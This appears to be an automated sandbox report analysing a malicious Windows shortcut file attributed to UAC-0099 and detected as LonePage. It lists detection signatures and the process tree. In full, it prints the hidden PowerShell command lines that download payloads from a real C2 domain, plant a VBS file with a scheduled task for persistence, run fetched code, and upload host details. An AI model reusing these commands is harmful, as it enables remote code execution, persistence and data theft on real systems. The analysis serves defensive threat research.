Edit tour
Windows
Analysis Report
XnQmVRj5g0.lnk
Overview
General Information
Sample name: | XnQmVRj5g0.lnkrenamed because original name is a hash value |
Original sample name: | b415741b40f9031d1810d06f0bcbcaa0d611c07ccbc3b04828ac779ee9e05a2a.lnk |
Analysis ID: | 1522698 |
MD5: | 2fcd108de2e6877f79c4a05cb09488db |
SHA1: | bf42aa0d6a60edee62736782933fb9212138e605 |
SHA256: | b415741b40f9031d1810d06f0bcbcaa0d611c07ccbc3b04828ac779ee9e05a2a |
Tags: | lnkUAC-0099user-JAMESWT_MHT |
Infos: | |
Detection
LonePage
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download payload from hardcoded c2 list
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LonePage
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- powershell.exe (PID: 5904 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden -nop -noni -exec byp ass -c $w= new-object system.ne t.webclien t;$d=$w.do wnloadstri ng('https: //onedrive view.shop/ api/values /view/skly ar.txt'); $dd = [Sys tem.Conver t]::FromBa se64String ($d);[Syst em.IO.File ]::WriteAl lBytes($ho me+'\appda ta\local\t emp\sklyar .pdf', $dd );&$home\a ppdata\loc al\temp\sk lyar.pdf;$ a='ZGltIHI sIGMKc2V0I HIgPSBjcmV hdGVvYmplY 3QoIldTY3J pcHQuU2hlb GwiKQpjID0 gInBvd2Vyc 2hlbGwuZXh lIC1leGVjd XRpb25wb2x pY3kgYnlwY XNzIC13IGh pZGRlbiAtb m9wcm9maWx lIC1jIHN0Y XJ0LXNsZWV wIDM5O3N0Y XJ0LXNsZWV wIChnZXQtc mFuZG9tIC1 taW4gNSAtb WF4IDQzKTt zdGFydC1zb GVlcCAxMTs kaWlrPW5ld y1vYmplY3Q gbmV0LndlY mNsaWVudDs kcmMgPSAta m9pbiAoKDQ 4Li41Nykgf CBnZXQtcmF uZG9tIC1jb 3VudCggZ2V 0LXJhbmRvb SAtbWluIDU gLW1heCAxN SkgfCBmb3J lYWNoLW9ia mVjdCB7IFt jaGFyXSRff SkgKyAnLnR 4dCc7JGZsb T0kaWlrLmR vd25sb2FkZ GF0YSgnaHR 0cHM6Ly9vb mVkcml2ZXZ pZXcuc2hvc C9hcGkvdmF sdWVzLzgyO TgwNDY0MjQ zODIyMTE1N zAwL3JlZnJ lc2g4MS8nK yRyYyk7aWY oJGZsbS5MZ W5ndGggLWd 0IDEpeyRqa 3I9W3N5c3R lbS50ZXh0L mVuY29kaW5 nXTo6dXRmO C5nZXRTdHJ pbmcoJGZsb Sk7aWYoJGp rciAtbWF0Y 2ggJ2dldC1 jb250ZW50J yl7W2J5dGV bXV0gJGRyc Hk9SUVYICR qa3I7fWVsc 2V7JGJqZG8 9d2hvYW1pO yRiamRvKz0 nPT0nOyRia mRvKz1bU3l zdGVtLk5ld C5EbnNdOjp HZXRIb3N0Q WRkcmVzc2V zKCRpcCkrW 1N5c3RlbS5 FbnZpcm9ub WVudF06Ok5 ld0xpbmU7J Ghibj1JRVg gJGprcjskY mpkbys9JGh ibnxPdXQtc 3RyaW5nO1t ieXRlW11dJ GRycHk9W3N 5c3RlbS50Z Xh0LmVuY29 kaW5nXTo6V XRmOC5HZXR CeXRlcygkY mpkbyk7fTt zdGFydC1zb GVlcCAxMDs kdWprPW5ld y1vYmplY3Q gbmV0LndlY mNsaWVudDt zdGFydC1zb GVlcCAxNjs kdWprLnVwb G9hZGRhdGE oJ2h0dHBzO i8vb25lZHJ pdmV2aWV3L nNob3AvYXB pL3ZhbHVlc y9yZWZyZXN oODEnLCRkc nB5KTt9Igp yLlJ1biBjL CAwLCBmYWx zZQ==';$b= [System.Co nvert]::Fr omBase64St ring($a);$ c=[System. Text.Encod ing]::utf8 .GetString ($b);set-c ontent C:\ Users\Publ ic\Librari es\Librari es.vbs -va lue $c;sch tasks.exe /create /T N Explorer CoreUpdate TaskMachin e /SC minu te /mo 3 / tr C:\User s\Public\L ibraries\L ibraries.v bs /f; MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1200 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Acrobat.exe (PID: 7188 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \appdata\l ocal\temp\ sklyar.pdf " MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7468 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7720 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=20 96 --field -trial-han dle=1588,i ,905989185 321007172, 1458696176 1040631262 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - schtasks.exe (PID: 7340 cmdline:
"C:\Window s\system32 \schtasks. exe" /crea te /TN Exp lorerCoreU pdateTaskM achine /SC minute /m o 3 /tr C: \Users\Pub lic\Librar ies\Librar ies.vbs /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- wscript.exe (PID: 7416 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\Public\L ibraries\L ibraries.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7352 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -execution policy byp ass -w hid den -nopro file -c st art-sleep 39;start-s leep (get- random -mi n 5 -max 4 3);start-s leep 11;$i ik=new-obj ect net.we bclient;$r c = -join ((48..57) | get-rand om -count( get-rando m -min 5 - max 15) | foreach-ob ject { [ch ar]$_}) + '.txt';$fl m=$iik.dow nloaddata( 'https://o nedrivevie w.shop/api /values/82 9804642438 22115700/r efresh81/' +$rc);if($ flm.Length -gt 1){$j kr=[system .text.enco ding]::utf 8.getStrin g($flm);if ($jkr -mat ch 'get-co ntent'){[b yte[]] $dr py=IEX $jk r;}else{$b jdo=whoami ;$bjdo+='= =';$bjdo+= [System.Ne t.Dns]::Ge tHostAddre sses($ip)+ [System.En vironment] ::NewLine; $hbn=IEX $ jkr;$bjdo+ =$hbn|Out- string;[by te[]]$drpy =[system.t ext.encodi ng]::Utf8. GetBytes($ bjdo);};st art-sleep 10;$ujk=ne w-object n et.webclie nt;start-s leep 16;$u jk.uploadd ata('https ://onedriv eview.shop /api/value s/refresh8 1',$drpy); } MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1224 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- svchost.exe (PID: 7548 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- wscript.exe (PID: 4864 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\Public\L ibraries\L ibraries.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 4016 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -execution policy byp ass -w hid den -nopro file -c st art-sleep 39;start-s leep (get- random -mi n 5 -max 4 3);start-s leep 11;$i ik=new-obj ect net.we bclient;$r c = -join ((48..57) | get-rand om -count( get-rando m -min 5 - max 15) | foreach-ob ject { [ch ar]$_}) + '.txt';$fl m=$iik.dow nloaddata( 'https://o nedrivevie w.shop/api /values/82 9804642438 22115700/r efresh81/' +$rc);if($ flm.Length -gt 1){$j kr=[system .text.enco ding]::utf 8.getStrin g($flm);if ($jkr -mat ch 'get-co ntent'){[b yte[]] $dr py=IEX $jk r;}else{$b jdo=whoami ;$bjdo+='= =';$bjdo+= [System.Ne t.Dns]::Ge tHostAddre sses($ip)+ [System.En vironment] ::NewLine; $hbn=IEX $ jkr;$bjdo+ =$hbn|Out- string;[by te[]]$drpy =[system.t ext.encodi ng]::Utf8. GetBytes($ bjdo);};st art-sleep 10;$ujk=ne w-object n et.webclie nt;start-s leep 16;$u jk.uploadd ata('https ://onedriv eview.shop /api/value s/refresh8 1',$drpy); } MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3824 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 6804 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\Public\L ibraries\L ibraries.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7100 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -execution policy byp ass -w hid den -nopro file -c st art-sleep 39;start-s leep (get- random -mi n 5 -max 4 3);start-s leep 11;$i ik=new-obj ect net.we bclient;$r c = -join ((48..57) | get-rand om -count( get-rando m -min 5 - max 15) | foreach-ob ject { [ch ar]$_}) + '.txt';$fl m=$iik.dow nloaddata( 'https://o nedrivevie w.shop/api /values/82 9804642438 22115700/r efresh81/' +$rc);if($ flm.Length -gt 1){$j kr=[system .text.enco ding]::utf 8.getStrin g($flm);if ($jkr -mat ch 'get-co ntent'){[b yte[]] $dr py=IEX $jk r;}else{$b jdo=whoami ;$bjdo+='= =';$bjdo+= [System.Ne t.Dns]::Ge tHostAddre sses($ip)+ [System.En vironment] ::NewLine; $hbn=IEX $ jkr;$bjdo+ =$hbn|Out- string;[by te[]]$drpy =[system.t ext.encodi ng]::Utf8. GetBytes($ bjdo);};st art-sleep 10;$ujk=ne w-object n et.webclie nt;start-s leep 16;$u jk.uploadd ata('https ://onedriv eview.shop /api/value s/refresh8 1',$drpy); } MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 724 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LonePage | Yara detected LonePage | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
Click to see the 37 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Spreading |
---|
Source: | Author: Joe Security: |